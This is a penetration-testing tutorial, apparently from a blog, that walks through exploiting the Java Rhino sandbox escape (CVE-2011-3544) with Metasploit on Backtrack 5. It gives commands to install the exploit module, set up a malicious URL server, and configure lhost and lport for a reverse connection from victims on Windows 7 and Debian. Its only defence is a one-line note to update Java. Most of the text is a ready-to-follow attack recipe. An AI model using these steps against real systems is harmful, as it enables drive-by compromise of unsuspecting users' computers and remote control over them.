Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R 1
Victim O.S : Windows 7 SP 1, Linux Debian 6
Exploit Credits : Michael Schierl, Juan Vazquez, Edward D. Teach, Sinn3r
This is a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The quote I got from zerodayinitiative.com. This exploit will attack vulnerability found in Java Runtime environment, all Java version 6, 7 are affected. To view the details of affected Java version, you can refer to this Oracle advisories(http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html).
1. Download the Java Rhino exploit from the link above, and then copy into following folder
cp java_rhino.rb /pentest/exploits/framework/modules/exploits/multi/browser/
2. Open your Metasploit console by typing msfconsole from terminal, and then use the exploit you've just added before and also set up the payload.
3. The next step you need to define the switch to make sure an attack can be launched successfully, and after everything looks fine and good, we're ready to perform the exploit to run the exploit server.
set srvhost 192.168.8.93 --> attacker ip address set srvport 80 --> attacker local port to open set uripath java_rhino --> uripath to send to victim set lhost 192.168.8.93 --> address for reverse connection if attack successful set lport 443 --> local port to handle victim connection if attack success exploit --> run the exploit
4. The picture below is screenshot from victim when he/she opened the malicious URL.
5. As soon as victim open our malicious link, our metasploit console get something interesting.
Note: if you got this error :
Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class
you can see the first comment down here how to solve it.
6. This picture below when I'm try on Debian 6 Iceweasel.
1. Update your Java Runtime to the newer version.